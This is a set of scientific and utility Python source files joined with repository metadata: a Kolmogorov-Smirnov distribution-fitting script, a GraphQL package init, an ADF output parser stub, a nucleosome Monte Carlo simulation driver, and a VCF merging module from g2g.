tab[cols].write_sortable_html('{0}.exposures.html'.format(root), replace_braces=True, localhost=False, max_lines=1e5, table_id=None, table_class='display compact', css=None, filter_columns=[], buttons=['csv'], toggle=True, use_json=False)
|
gbrammer/grizli
|
grizli/pipeline/auto_script.py
|
Python
|
mit
| 183,603
|
[
"Gaussian",
"VisIt"
] |
1cc9b180913321bb6450c6fcb72246f789efcdc48e8333d58d249707627652f2
|
#!/usr/bin/env python
#title :distribution_checkX.py
#description :Checks a sample against 80 distributions by applying the Kolmogorov-Smirnov test.
#author :Andre Dietrich
#email :dietrich@ivs.cs.uni-magdeburg.de
#date :07.10.2014
#version :0.1
#usage :python distribution_check.py -f filename -v
#python_version :2.* and 3.*
#########################################################################################
from __future__ import print_function
import scipy.stats
import operator
import warnings
import random
import math
# just for surpressing warnings
warnings.simplefilter('ignore')
from joblib import Parallel, delayed
import multiprocessing
from optparse import OptionParser
########################################################################################
# list of all available distributions
cdfs = {
"alpha": {"p":[], "D": []}, #Alpha
"anglit": {"p":[], "D": []}, #Anglit
"arcsine": {"p":[], "D": []}, #Arcsine
"beta": {"p":[], "D": []}, #Beta
"betaprime": {"p":[], "D": []}, #Beta Prime
"bradford": {"p":[], "D": []}, #Bradford
"burr": {"p":[], "D": []}, #Burr
"cauchy": {"p":[], "D": []}, #Cauchy
"chi": {"p":[], "D": []}, #Chi
"chi2": {"p":[], "D": []}, #Chi-squared
"cosine": {"p":[], "D": []}, #Cosine
"dgamma": {"p":[], "D": []}, #Double Gamma
"dweibull": {"p":[], "D": []}, #Double Weibull
"erlang": {"p":[], "D": []}, #Erlang
"expon": {"p":[], "D": []}, #Exponential
"exponweib": {"p":[], "D": []}, #Exponentiated Weibull
"exponpow": {"p":[], "D": []}, #Exponential Power
"f": {"p":[], "D": []}, #F (Snecdor F)
"fatiguelife": {"p":[], "D": []}, #Fatigue Life (Birnbaum-Sanders)
"fisk": {"p":[], "D": []}, #Fisk
"foldcauchy": {"p":[], "D": []}, #Folded Cauchy
"foldnorm": {"p":[], "D": []}, #Folded Normal
"frechet_r": {"p":[], "D": []}, #Frechet Right Sided, Extreme Value Type II
"frechet_l": {"p":[], "D": []}, #Frechet Left Sided, Weibull_max
"gamma": {"p":[], "D": []}, #Gamma
"gausshyper": {"p":[], "D": []}, #Gauss Hypergeometric
"genexpon": {"p":[], "D": []}, #Generalized Exponential
"genextreme": {"p":[], "D": []}, #Generalized Extreme Value
"gengamma": {"p":[], "D": []}, #Generalized gamma
"genhalflogistic": {"p":[], "D": []}, #Generalized Half Logistic
"genlogistic": {"p":[], "D": []}, #Generalized Logistic
"genpareto": {"p":[], "D": []}, #Generalized Pareto
"gilbrat": {"p":[], "D": []}, #Gilbrat
"gompertz": {"p":[], "D": []}, #Gompertz (Truncated Gumbel)
"gumbel_l": {"p":[], "D": []}, #Left Sided Gumbel, etc.
"gumbel_r": {"p":[], "D": []}, #Right Sided Gumbel
"halfcauchy": {"p":[], "D": []}, #Half Cauchy
"halflogistic": {"p":[], "D": []}, #Half Logistic
"halfnorm": {"p":[], "D": []}, #Half Normal
"hypsecant": {"p":[], "D": []}, #Hyperbolic Secant
"invgamma": {"p":[], "D": []}, #Inverse Gamma
"invgauss": {"p":[], "D": []}, #Inverse Normal
"invweibull": {"p":[], "D": []}, #Inverse Weibull
"johnsonsb": {"p":[], "D": []}, #Johnson SB
"johnsonsu": {"p":[], "D": []}, #Johnson SU
"laplace": {"p":[], "D": []}, #Laplace
"logistic": {"p":[], "D": []}, #Logistic
"loggamma": {"p":[], "D": []}, #Log-Gamma
"loglaplace": {"p":[], "D": []}, #Log-Laplace (Log Double Exponential)
"lognorm": {"p":[], "D": []}, #Log-Normal
"lomax": {"p":[], "D": []}, #Lomax (Pareto of the second kind)
"maxwell": {"p":[], "D": []}, #Maxwell
"mielke": {"p":[], "D": []}, #Mielke's Beta-Kappa
"nakagami": {"p":[], "D": []}, #Nakagami
"ncx2": {"p":[], "D": []}, #Non-central chi-squared
"ncf": {"p":[], "D": []}, #Non-central F
"nct": {"p":[], "D": []}, #Non-central Student's T
"norm": {"p":[], "D": []}, #Normal (Gaussian)
"pareto": {"p":[], "D": []}, #Pareto
"pearson3": {"p":[], "D": []}, #Pearson type III
"powerlaw": {"p":[], "D": []}, #Power-function
"powerlognorm": {"p":[], "D": []}, #Power log normal
"powernorm": {"p":[], "D": []}, #Power normal
"rdist": {"p":[], "D": []}, #R distribution
"reciprocal": {"p":[], "D": []}, #Reciprocal
"rayleigh": {"p":[], "D": []}, #Rayleigh
"rice": {"p":[], "D": []}, #Rice
"recipinvgauss": {"p":[], "D": []}, #Reciprocal Inverse Gaussian
"semicircular": {"p":[], "D": []}, #Semicircular
"t": {"p":[], "D": []}, #Student's T
"triang": {"p":[], "D": []}, #Triangular
"truncexpon": {"p":[], "D": []}, #Truncated Exponential
"truncnorm": {"p":[], "D": []}, #Truncated Normal
"tukeylambda": {"p":[], "D": []}, #Tukey-Lambda
"uniform": {"p":[], "D": []}, #Uniform
"vonmises": {"p":[], "D": []}, #Von-Mises (Circular)
"wald": {"p":[], "D": []}, #Wald
"weibull_min": {"p":[], "D": []}, #Minimum Weibull (see Frechet)
"weibull_max": {"p":[], "D": []}, #Maximum Weibull (see Frechet)
"wrapcauchy": {"p":[], "D": []}, #Wrapped Cauchy
"ksone": {"p":[], "D": []}, #Kolmogorov-Smirnov one-sided (no stats)
"kstwobign": {"p":[], "D": []}} #Kolmogorov-Smirnov two-sided test for Large N
########################################################################################
# this part is only used to read in the file ...
# format should be :
# 0.00192904472351
# 0.0030369758606
# 0.00188088417053
# 0.00222492218018
# 0.00447607040405
# 0.00301194190979
def read(filename):
if not options.filename == "":
print("reading data in file %s ... " % options.filename, end="")
f = open(options.filename)
data = [float(value) for value in f.readlines()]
f.close()
print("done")
return data
########################################################################################
def check(data, fct, verbose=False):
#fit our data set against every probability distribution
parameters = eval("scipy.stats."+fct+".fit(data)");
#Applying the Kolmogorov-Smirnof two sided test
D, p = scipy.stats.kstest(data, fct, args=parameters);
if math.isnan(p): p=0
if math.isnan(D): D=0
if verbose:
print(fct.ljust(16) + "p: " + str(p).ljust(25) + "D: " +str(D))
return (fct, p, D)
########################################################################################
def plot(fcts, data):
import matplotlib.pyplot as plt
import numpy as np
# plot data
plt.hist(data, normed=True, bins=max(10, len(data)/10))
# plot fitted probability
for fct in fcts:
params = eval("scipy.stats."+fct+".fit(data)")
f = eval("scipy.stats."+fct+".freeze"+str(params))
x = np.linspace(f.ppf(0.001), f.ppf(0.999), 500)
plt.plot(x, f.pdf(x), lw=3, label=fct)
plt.legend(loc='best', frameon=False)
plt.title("Top "+str(len(fcts))+" Results")
plt.show()
def plotDensities(best):
import matplotlib.pyplot as plt
import numpy as np
plt.ion()
plt.clf()
# plot fitted probability
for i in range(len(best)-1, -1, -1):
fct, values = best[i]
plt.hist(values["p"], normed=True, bins=max(10, len(values["p"])/10), label=str(i+1)+". "+fct, alpha=0.5)
plt.legend(loc='best', frameon=False)
plt.title("Top Results")
plt.show()
plt.draw()
if __name__ == '__main__':
#########################################################################################
parser = OptionParser()
parser.add_option("-f", "--file", dest="filename", default="", type="string", help="file with measurement data", metavar="FILE")
parser.add_option("-v", "--verbose", dest="verbose", default=False, action="store_true", help="print all results immediately (default=False)" )
parser.add_option("-t", "--top", dest="top", default=10, type="int", help="define amount of printed results (default=10)")
parser.add_option("-p", "--plot", dest="plot", default=False, action="store_true", help="plot the best result with matplotlib (default=False)")
parser.add_option("-i", "--iterative", dest="iterative", default=1, type="int", help="define number of iterative checks (default=1)")
parser.add_option("-e", "--exclude", dest="exclude", default=10.0, type="float", help="amount (in per cent) of exluded samples for each iteration (default=10.0%)" )
parser.add_option("-n", "--processes", dest="processes", default=-1, type="int", help="number of process used in parallel (default=-1...all)")
parser.add_option("-d", "--densities", dest="densities", default=False, action="store_true", help="")
parser.add_option("-g", "--generate", dest="generate", default=False, action="store_true", help="generate an example file")
(options, args) = parser.parse_args()
if options.generate:
print("generating random data 'example-halflogistic.dat' ... ", end="")
f = open("example-halflogistic.dat", "w")
f.writelines([str(s)+"\n" for s in scipy.stats.halflogistic().rvs(500)])
f.close()
print("done")
quit()
# read data from file or generate
DATA = read(options.filename)
for i in range(options.iterative):
if options.iterative == 1:
data = DATA
else:
data = [value for value in DATA if random.random()>= options.exclude/100]
results = Parallel(n_jobs=options.processes)(delayed(check)(data, fct, options.verbose) for fct in cdfs.keys())
for res in results:
key, p, D = res
cdfs[key]["p"].append(p)
cdfs[key]["D"].append(D)
print( "-------------------------------------------------------------------" )
print( "Top %d after %d iteration(s)" % (options.top, i+1, ) )
print( "-------------------------------------------------------------------" )
best = sorted(cdfs.items(), key=lambda elem : scipy.median(elem[1]["p"]), reverse=True)
for t in range(options.top):
fct, values = best[t]
print( str(t+1).ljust(4), fct.ljust(16),
"\tp: ", scipy.median(values["p"]),
"\tD: ", scipy.median(values["D"]),
end="")
if len(values["p"]) > 1:
print("\tvar(p): ", scipy.var(values["p"]),
"\tvar(D): ", scipy.var(values["D"]), end="")
print()
if options.densities:
plotDensities(best[:t+1])
if options.plot:
# get only the names ...
plot([b[0] for b in best[:options.top]], DATA)
|
Kirubaharan/hydrology
|
stats/distribution_check.py
|
Python
|
gpl-3.0
| 11,192
|
[
"Gaussian"
] |
87eba6492fe2f06b8309bfc9ae33d5402df690dbabc1e1af86735b96ccf3d0c1
|
'''
GraphQL.js provides a reference implementation for the GraphQL specification
but is also a useful utility for operating on GraphQL files and building
sophisticated tools.
This primary module exports a general purpose function for fulfilling all
steps of the GraphQL specification in a single operation, but also includes
utilities for every part of the GraphQL specification:
- Parsing the GraphQL language.
- Building a GraphQL type schema.
- Validating a GraphQL request against a type schema.
- Executing a GraphQL request against a type schema.
This also includes utility functions for operating on GraphQL types and
GraphQL documents to facilitate building tools.
You may also import from each sub-directory directly. For example, the
following two import statements are equivalent:
from graphql import parse
from graphql.language.base import parse
'''
from .pyutils.version import get_version
try:
# This variable is injected in the __builtins__ by the build
# process. It used to enable importing subpackages when
# the required packages are not installed
__GRAPHQL_SETUP__
except NameError:
__GRAPHQL_SETUP__ = False
VERSION = (1, 1, 0, 'final', 0)
__version__ = get_version(VERSION)
if not __GRAPHQL_SETUP__:
# The primary entry point into fulfilling a GraphQL request.
from .graphql import (
graphql
)
# Create and operate on GraphQL type definitions and schema.
from .type import ( # no import order
GraphQLSchema,
# Definitions
GraphQLScalarType,
GraphQLObjectType,
GraphQLInterfaceType,
GraphQLUnionType,
GraphQLEnumType,
GraphQLInputObjectType,
GraphQLList,
GraphQLNonNull,
GraphQLField,
GraphQLInputObjectField,
GraphQLArgument,
# "Enum" of Type Kinds
TypeKind,
# "Enum" of Directive locations
DirectiveLocation,
# Scalars
GraphQLInt,
GraphQLFloat,
GraphQLString,
GraphQLBoolean,
GraphQLID,
# Directive definition
GraphQLDirective,
# Built-in directives defined by the Spec
specified_directives,
GraphQLSkipDirective,
GraphQLIncludeDirective,
GraphQLDeprecatedDirective,
# Constant Deprecation Reason
DEFAULT_DEPRECATION_REASON,
# GraphQL Types for introspection.
__Schema,
__Directive,
__DirectiveLocation,
__Type,
__Field,
__InputValue,
__EnumValue,
__TypeKind,
# Meta-field definitions.
SchemaMetaFieldDef,
TypeMetaFieldDef,
TypeNameMetaFieldDef,
# Predicates
is_type,
is_input_type,
is_output_type,
is_leaf_type,
is_composite_type,
is_abstract_type,
# Un-modifiers
get_nullable_type,
get_named_type,
)
# Parse and operate on GraphQL language source files.
from .language.base import ( # no import order
Source,
get_location,
# Parse
parse,
parse_value,
# Print
print_ast,
# Visit
visit,
ParallelVisitor,
TypeInfoVisitor,
BREAK,
)
# Execute GraphQL queries.
from .execution import ( # no import order
execute,
MiddlewareManager,
middlewares
)
# Validate GraphQL queries.
from .validation import ( # no import order
validate,
specified_rules,
)
# Create and format GraphQL errors.
from .error import (
GraphQLError,
format_error,
)
# Utilities for operating on GraphQL type schema and parsed sources.
from .utils.base import (
# The GraphQL query recommended for a full schema introspection.
introspection_query,
# Gets the target Operation from a Document
get_operation_ast,
# Build a GraphQLSchema from an introspection result.
build_client_schema,
# Build a GraphQLSchema from a parsed GraphQL Schema language AST.
build_ast_schema,
# Extends an existing GraphQLSchema from a parsed GraphQL Schema
# language AST.
extend_schema,
# Print a GraphQLSchema to GraphQL Schema language.
print_schema,
# Create a GraphQLType from a GraphQL language AST.
type_from_ast,
# Create a JavaScript value from a GraphQL language AST.
value_from_ast,
# Create a GraphQL language AST from a JavaScript value.
ast_from_value,
# A helper to use within recursive-descent visitors which need to be aware of
# the GraphQL type system.
TypeInfo,
# Determine if JavaScript values adhere to a GraphQL type.
is_valid_value,
# Determine if AST values adhere to a GraphQL type.
is_valid_literal_value,
# Concatenates multiple AST together.
concat_ast,
# Comparators for types
is_equal_type,
is_type_sub_type_of,
do_types_overlap,
# Asserts a string is a valid GraphQL name.
assert_valid_name,
)
__all__ = (
'graphql',
'GraphQLBoolean',
'GraphQLEnumType',
'GraphQLFloat',
'GraphQLID',
'GraphQLInputObjectType',
'GraphQLInt',
'GraphQLInterfaceType',
'GraphQLList',
'GraphQLNonNull',
'GraphQLField',
'GraphQLInputObjectField',
'GraphQLArgument',
'GraphQLObjectType',
'GraphQLScalarType',
'GraphQLSchema',
'GraphQLString',
'GraphQLUnionType',
'GraphQLDirective',
'specified_directives',
'GraphQLSkipDirective',
'GraphQLIncludeDirective',
'GraphQLDeprecatedDirective',
'DEFAULT_DEPRECATION_REASON',
'TypeKind',
'DirectiveLocation',
'__Schema',
'__Directive',
'__DirectiveLocation',
'__Type',
'__Field',
'__InputValue',
'__EnumValue',
'__TypeKind',
'SchemaMetaFieldDef',
'TypeMetaFieldDef',
'TypeNameMetaFieldDef',
'get_named_type',
'get_nullable_type',
'is_abstract_type',
'is_composite_type',
'is_input_type',
'is_leaf_type',
'is_output_type',
'is_type',
'BREAK',
'ParallelVisitor',
'Source',
'TypeInfoVisitor',
'get_location',
'parse',
'parse_value',
'print_ast',
'visit',
'execute',
'MiddlewareManager',
'middlewares',
'specified_rules',
'validate',
'GraphQLError',
'format_error',
'TypeInfo',
'assert_valid_name',
'ast_from_value',
'build_ast_schema',
'build_client_schema',
'concat_ast',
'do_types_overlap',
'extend_schema',
'get_operation_ast',
'introspection_query',
'is_equal_type',
'is_type_sub_type_of',
'is_valid_literal_value',
'is_valid_value',
'print_schema',
'type_from_ast',
'value_from_ast',
'get_version',
)
|
wandb/client
|
wandb/vendor/graphql-core-1.1/wandb_graphql/__init__.py
|
Python
|
mit
| 7,300
|
[
"VisIt"
] |
c76333382ed88a97450acbc2999575a2069a714c6f7476934e46dd6f8759b8d2
|
## -*- coding: utf-8 -*-
## Copyright (c) 2015-2018, Exa Analytics Development Team
## Distributed under the terms of the Apache License 2.0
#"""
#Parser for ADF's SCF Section
################################
#Parses the 'S C F' section of an ADF block output.
#"""
#from exa import Parser, Matches, Match
#
#
#class SCF(Parser):
# """
# """
# _start = " S C F"
# _stop = -1
#
# def _parse_stops_1(self, starts):
# """
# """
# key = " Integrated fractional orbital density"
# matches = []
# for start in starts:
# m = self.find_next(key, cursor=start[0])
# if m is None:
# matches.append(Match(len(self), None))
# else:
# matches.append(m)
# return Matches(key, *matches)
|
avmarchenko/exatomic
|
exatomic/adf/adf/scf.py
|
Python
|
apache-2.0
| 793
|
[
"ADF"
] |
5be68e21eac438ae3e57a4e30f4a4d8c906647592c273ec7b83dc3c28981ebf5
|
'''
Driver method to run the monte_carlo module using mixed DNA and protein moves
with simple options for a nucleosomecore particle (NCP)
$Id: gui_mimic_simplest_ncp.py 3103 2016-04-26 20:15:12Z schowell $
'''
import sys
import multiprocessing
import sassie.interface.input_filter as input_filter
import sassie.simulate.monte_carlo.monte_carlo as monte_carlo
# import monte_carlo
svariables = {}
################################# user input ##################################
################################# user input ##################################
################################# user input ##################################
# input files
pdbfile='c36_w601_ncp_min.pdb'
psffile='c36_w601_ncp.psf'
# output file
dcdfile='ncp_test.dcd'
# run parameters
runname = 'run_ncp_test'
trial_steps = '10'
goback = '1'
temperature = '300.0'
n_flex_regions = 2
number_of_flexible_regions = str(n_flex_regions)
rotation_direction_array = ['reverse'] * n_flex_regions # irrelevant for DNA
delta_theta_array = '10.0, 30.0'
overlap_basis = 'heavy'
# setup flexible regions
basis_string_array = []
post_basis_string_array = []
basis_string_array.append(
'(segname DNA1 and resid > 150 and resid < 161) or (segname DNA2 and resid > 193 and resid < 204)'
)
basis_string_array.append(
'segname 1H3 and resid < 40 and resid > 1'
)
post_basis_string_array.append(
'(segname DNA1 and resid 161) or (segname DNA2 and resid 193)'
)
post_basis_string_array.append(
'segname 1H3 and resid <= 1'
)
rotation_type_array = ['double_stranded_nucleic_torsion',
'protein_backbone_torsion']
# hard coded parameters
psf_flag = True
# openmm parameters no longer used but still required (irrelevant)
max_steps = '5000'
energy_convergence = '1.0'
step_size = '0.002'
# advanced input (may not be fully implemented)
low_rg_cutoff = '0'
high_rg_cutoff = '400.0'
z_flag = False
z_cutoff = '0.0'
constraint_flag = False
constraint_file = 'constraints.txt'
directed_mc = '0'
nonbondflag = '0' # not sure what this is for
seed = '0,123' # set this to '1,123' ('0,123') to (not) set the seed
############################### end user input ################################
############################### end user input ################################
############################### end user input ################################
svariables['runname'] = (runname, 'string')
svariables['dcdfile'] = (dcdfile, 'string')
svariables['pdbfile'] = (pdbfile, 'string')
svariables['psffile'] = (psffile, 'string')
svariables['psf_flag'] = (psf_flag, 'string')
svariables['max_steps'] = (max_steps, 'int')
svariables['energy_convergence'] = (energy_convergence, 'float')
svariables['step_size'] = (step_size, 'float')
svariables['number_of_flexible_regions'] = (number_of_flexible_regions, 'int')
svariables['basis_string_array'] = (basis_string_array, 'string')
svariables['delta_theta_array'] = (delta_theta_array, 'float_array')
svariables['rotation_type_array'] = (rotation_type_array, 'string')
svariables['rotation_direction_array'] = (rotation_direction_array, 'string')
svariables['overlap_basis'] = (overlap_basis, 'string')
svariables['post_basis_string_array'] = (post_basis_string_array, 'string')
svariables['temperature'] = (temperature, 'float')
svariables['trial_steps'] = (trial_steps, 'int')
svariables['goback'] = (goback, 'int')
svariables['directed_mc'] = (directed_mc, 'float')
svariables['low_rg_cutoff'] = (low_rg_cutoff, 'float')
svariables['high_rg_cutoff'] = (high_rg_cutoff, 'float')
svariables['z_flag'] = (z_flag, 'boolean')
svariables['z_cutoff'] = (z_cutoff, 'float')
svariables['constraint_flag'] = (constraint_flag, 'boolean')
svariables['constraint_file'] = (constraint_file, 'string')
svariables['nonbondflag'] = (nonbondflag, 'int')
svariables['seed'] = (seed, 'int_array')
error, variables = input_filter.type_check_and_convert(svariables)
assert not error, 'ERROR: %s' % error
txtQueue=multiprocessing.JoinableQueue()
simulation = monte_carlo.simulation()
simulation.main(variables, txtQueue)
this_text = txtQueue.get(True, timeout=0.1)
# perform alignment
try:
import os
import subprocess
import sassie.util.file_utils as file_utils
import sassie.tools.align_driver as align_driver
dcd = os.path.join(runname, 'monte_carlo', dcdfile)
assert os.path.exists(dcd), 'no such file: %s' % dcd
align_basis = (
'((name[i] == "CA") and (segname[i] == "1H2A") and (resid[i] > 105) and (resid[i] < 115))'
)
inputs = align_driver.inputs()
inputs.path = ''
inputs.goal_filter = align_basis
inputs.move_filter = align_basis
inputs.goal = pdbfile
inputs.ref = pdbfile
inputs.move = dcd
inputs.out = dcd.replace('.dcd', '_al.dcd')
file_utils.mkdir_p(os.path.split(inputs.out)[0])
align_driver.align(inputs)
cmd = 'mv %s %s' % (inputs.out, inputs.move)
return_code = subprocess.call(cmd, shell=True)
if return_code:
print 'Failed to move output: %s' % cmd
except:
print 'Aligment of NCP failed'
|
madscatt/zazzie_1.5
|
trunk/sassie/simulate/monte_carlo/gui_mimic_simplest_ncp.py
|
Python
|
gpl-3.0
| 5,047
|
[
"OpenMM"
] |
afeedc21e3aec0aded9b62acdfe1ac8edcaecc1ebfc43f7484d41560cf171855
|
# -*- coding: utf-8 -*-
#
# A way to combine vcf files
#
from collections import OrderedDict
from past.builtins import xrange
import multiprocessing
import os
import time
import pysam
from . import exceptions
from . import fasta
from . import g2g
from . import g2g_utils
from . import vcf
LOG = g2g.get_logger()
class VCFFileInformation:
def __init__(self, file_name=None, discard_file=None, sample_index=None):
self.file_name = file_name
self.discard_file = discard_file
self.sample_index = sample_index
self.lines = 0
def __str__(self):
return "{}, {}".format(self.file_name, self.sample_index)
class VCF2VCIInfo(object):
def __init__(self):
self.chromosome = None
# list of VCFFileInformation
self.vcf_files = []
self.fasta_file = None
# indel specific
self.prev_next_ref_pos_right = 1
self.prev_next_ref_pos_left = 1
self.diploid = False
self.passed = False
self.quality = False
self.vcf_keep = False
self.output_file_left = None
self.output_file_right = None
self.stats_left = {}
self.stats_right = {}
def walk_vcfs_together(readers, **kwargs):
if 'vcf_record_sort_key' in kwargs:
get_key = kwargs['vcf_record_sort_key']
else:
get_key = lambda r: (r.contig, r.pos)
nexts = []
for reader in readers:
try:
if reader:
nexts.append(reader.next())
else:
nexts.append(None)
except StopIteration:
nexts.append(None)
min_k = (None,)
while any([r is not None for r in nexts]):
next_idx_to_k = dict((i, get_key(r)) for i, r in enumerate(nexts) if r is not None)
keys_with_prev_contig = [k for k in next_idx_to_k.values() if k[0] == min_k[0]]
if any(keys_with_prev_contig):
min_k = min(keys_with_prev_contig)
else:
min_k = min(next_idx_to_k.values())
min_k_idxs = set([i for i, k in next_idx_to_k.items() if k == min_k])
yield [nexts[i] if i in min_k_idxs else None for i in range(len(nexts))]
for i in min_k_idxs:
try:
nexts[i] = readers[i].next()
except StopIteration:
nexts[i] = None
#: TODO: utilize stats
def update_stats(stats, reason):
if not stats:
stats = {}
if reason in stats:
stats[reason] += 1
else:
stats[reason] = 1
return stats
def process_piece(merge_info):
stats = {}
try:
output_file_left = None
output_file_right = None
if merge_info.output_file_left:
output_file_left = open(merge_info.output_file_left, "w")
if merge_info.output_file_right:
output_file_right = open(merge_info.output_file_right, "w")
mi = ['L']
if merge_info.diploid:
mi = ['L', 'R']
LOG.info("Processing Chromosome {0}...".format(merge_info.chromosome))
iterators = []
discard_functions = []
for i, file_info in enumerate(merge_info.vcf_files):
vcf_tabix = pysam.TabixFile(file_info.file_name)
try:
vcf_iterator = vcf_tabix.fetch(merge_info.chromosome, parser=pysam.asVCF())
iterators.append(vcf_iterator)
except ValueError as ve:
iterators.append(None)
if file_info.discard_file:
vcf_discard = open(file_info.discard_file, "w")
def discard_record(rec):
vcf_discard.write(str(rec))
vcf_discard.write("\n")
discard_functions.append(discard_record)
else:
discard_functions.append(lambda rec: None)
n = 0
line_numbers = 0
for vcf_records in walk_vcfs_together(iterators):
for i, vcf_record in enumerate(vcf_records):
#LOG.debug(vcf_record)
if vcf_record is None:
continue
#LOG.debug(vcf_record.alt)
#LOG.debug(type(vcf_record.alt))
gt = vcf.parse_gt_tuple(vcf_record, merge_info.vcf_files[i].sample_index)
#LOG.debug(gt)
line_numbers = line_numbers + 1
if gt.is_snp:
# snp
if merge_info.passed and 'PASS' not in vcf_record.filter:
discard_functions[i](vcf_record)
#LOG.debug("Processing SNP {}".format(vcf_record))
n += 1
if merge_info.quality and gt.fi == '0':
discard_functions[i](vcf_record)
elif gt.left is None or gt.right is None:
discard_functions[i](vcf_record)
else:
if merge_info.diploid:
# 0 i sthe same as REF and do not need
if gt.gt_left != 0:
output_file_left.write("{}_L\t{}\t{}\t{}\t{}\t{}\n".format(merge_info.chromosome, vcf_record.pos+1, '.', vcf_record.ref, gt.left, '.'))
if gt.gt_right != 0:
output_file_right.write("{}_R\t{}\t{}\t{}\t{}\t{}\n".format(merge_info.chromosome, vcf_record.pos+1, '.', vcf_record.ref, gt.right, '.'))
else:
if gt.gt_left == gt.gt_right and gt.gt_left != 0:
# ignore heterozygotes 0/1, 1/0, only process 0/0 and 1/1
#LOG.debug("ACCEPTED")
#LOG.debug('pos {} : ref {}, left {}, right {}'.format(vcf_snp.pos, vcf_snp.ref, gt.left, gt.right))
output_file_left.write("{}\t{}\t{}\t{}\t{}\t{}\n".format(merge_info.chromosome, vcf_record.pos+1, '.', vcf_record.ref, gt.left, '.'))
else:
# indel
LOG.debug("Processing INDEL {}".format(vcf_record))
if merge_info.passed and 'PASS' not in vcf_record.filter:
LOG.debug("TOSSED: FILTERED ON PASS")
LOG.debug(vcf_record)
stats = update_stats(stats, 'FILTERED ON PASS')
discard_functions[i](vcf_record)
continue
elif merge_info.quality and gt.fi == '0':
# FI : Whether a sample was a Pass(1) or fail (0) based on FILTER values
LOG.debug("TOSSED: FILTERED ON QUALITY")
LOG.debug(vcf_record)
stats = update_stats(stats, 'FILTERED ON QUALITY')
discard_functions[i](vcf_record)
continue
elif gt.left is None and gt.right is None:
LOG.debug("TOSSED: NO STRAIN DATA")
LOG.debug(vcf_record)
stats = update_stats(stats, 'NO STRAIN DATA')
LOG.debug(i)
LOG.debug(type(vcf_record))
discard_functions[i](vcf_record)
continue
elif not merge_info.diploid and gt.left != gt.right:
# haploid or hexaploid
# gt must be equal
LOG.debug("TOSSED: HETEROZYGOUS")
LOG.debug(vcf_record)
stats = update_stats(stats, 'HETEROZYGOUS')
discard_functions[i](vcf_record)
continue
# START L AND R, ONLY R IF DIPLOID
for l_or_r in mi:
#LOG.debug("******************")
#LOG.debug(l_or_r)
lr_out = ''
if l_or_r == 'L':
#LOG.debug("->LEFT")
lr_out = '_L' if merge_info.diploid else ''
alt_seq = str(gt.left)
stats = merge_info.stats_left
output_file = output_file_left
prev_next_ref_pos = merge_info.prev_next_ref_pos_left
else:
#LOG.debug("->RIGHT")
lr_out = '_R' if merge_info.diploid else ''
alt_seq = str(gt.right)
stats = merge_info.stats_right
output_file = output_file_right
prev_next_ref_pos = merge_info.prev_next_ref_pos_right
LOG.debug("prev_next_ref_pos={}".format(prev_next_ref_pos))
if gt.ref == alt_seq:
LOG.debug("TOSSED, REF AND ALT ARE EQUAL")
LOG.debug(vcf_record)
stats = update_stats(stats, 'REF AND ALT ARE EQUAL')
discard_functions[i](vcf_record)
continue
orig_alt_seq = alt_seq
LOG.debug("SAMPLE: {0}".format(vcf_record[merge_info.vcf_files[i].sample_index]))
LOG.debug("REF='{0}', ALT_L='{1}', ALT_R='{2}'. POS={3}".format(gt.ref, gt.left, gt.right, vcf_record.pos))
position = vcf_record.pos + 1
ref_seq = str(gt.ref)
len_ref = len(ref_seq)
len_alt = len(alt_seq)
base_changes = len_ref - len_alt
base_pos_diff = 0
if position < prev_next_ref_pos:
LOG.debug("TOSSED: VCF ROLLBACK: {0}".format(vcf_record))
LOG.debug(vcf_record)
stats = update_stats(stats, 'VCF ROLLBACK')
discard_functions[i](vcf_record)
continue
# find the position where the first base change is
for n in xrange(min(len_ref, len_alt)):
if ref_seq[n] != alt_seq[n]:
base_pos_diff = n
break
# if it is 0, take the minimum length
if base_pos_diff == 0:
base_pos_diff = min(len_ref, len_alt)
# add the base position difference
position += base_pos_diff
# recalculate the strings
shared_bases = ref_seq[:base_pos_diff]
ref_seq = ref_seq[base_pos_diff:]
alt_seq = alt_seq[base_pos_diff:]
dt = len(ref_seq)
dq = len(alt_seq)
next_ref_pos = position + len(ref_seq)
fragment_size = position - prev_next_ref_pos
'''
LOG.debug(' gt.ref: {0}'.format(gt.ref))
LOG.debug(' ref_seq: {0}'.format(ref_seq))
LOG.debug(' dt: {0}'.format(dt))
LOG.debug(' gt.alt: {0}'.format(orig_alt_seq))
LOG.debug(' alt_seq: {0}'.format(alt_seq))
LOG.debug(' dq: {0}'.format(dq))
LOG.debug(' position: {0}'.format(position))
LOG.debug('prev_next_ref_pos: {0}'.format(prev_next_ref_pos))
LOG.debug(' next_ref_pos: {0}'.format(next_ref_pos))
LOG.debug(' fragment_size: {0}'.format(fragment_size))
LOG.debug(' base_changes: {0}'.format(base_changes))
LOG.debug(' base_pos_diff: {0}'.format(base_pos_diff))
LOG.debug(' shared_bases: {0}'.format(shared_bases))
'''
# fix any 0 length
if fragment_size < 0:
#LOG.debug("TOSSED: FRAGMENT: {0}".format(vcf_record))
stats = update_stats(stats, 'FRAGMENT SIZE < 0')
discard_functions[i](vcf_record)
continue
if fragment_size != 0:
ref_str = ref_seq if ref_seq else '.'
alt_str = alt_seq if alt_seq else '.'
out = "{}{}\t{}\t{}\t{}\t{}\t{}\n".format(merge_info.chromosome, lr_out, vcf_record.pos+1, shared_bases, ref_str, alt_str, fragment_size)
LOG.debug(out)
output_file.write(out)
else:
#
# THIS SHOULD NOT HAPPEN
#
raise exceptions.G2GVCFError('Conflicting VCF entries')
stats = update_stats(stats, 'ACCEPTED')
if l_or_r == 'L':
merge_info.stats_left = stats
merge_info.prev_next_ref_pos_left = next_ref_pos
LOG.debug('setting merge_info.prev_next_ref_pos_left={}'.format(merge_info.prev_next_ref_pos_left))
else:
merge_info.stats_right = stats
merge_info.prev_next_ref_pos_right = next_ref_pos
LOG.debug('setting merge_info.prev_next_ref_pos_right={}'.format(merge_info.prev_next_ref_pos_right))
if merge_info.output_file_left:
output_file_left.close()
if merge_info.output_file_right:
output_file_right.close()
except KeyboardInterrupt:
raise exceptions.KeyboardInterruptError()
except Exception as e:
g2g_utils._show_error()
raise Exception("Unknown exception")
ret = {}
ret['chrom'] = merge_info.chromosome
ret['stats'] = stats
ret['merge_info'] = merge_info
ret['line_numbers'] = line_numbers
return ret
def wrapper(args):
"""
Simple wrapper, useful for debugging.
:param args: the arguments to process_piece
:return: the same as process_piece
"""
LOG.debug(args)
return process_piece(*args)
def log_stats(stats):
LOG.info("STATISTICS")
for s, stat in stats.items():
LOG.info("{0:,}\t\t{1}".format(stat, s))
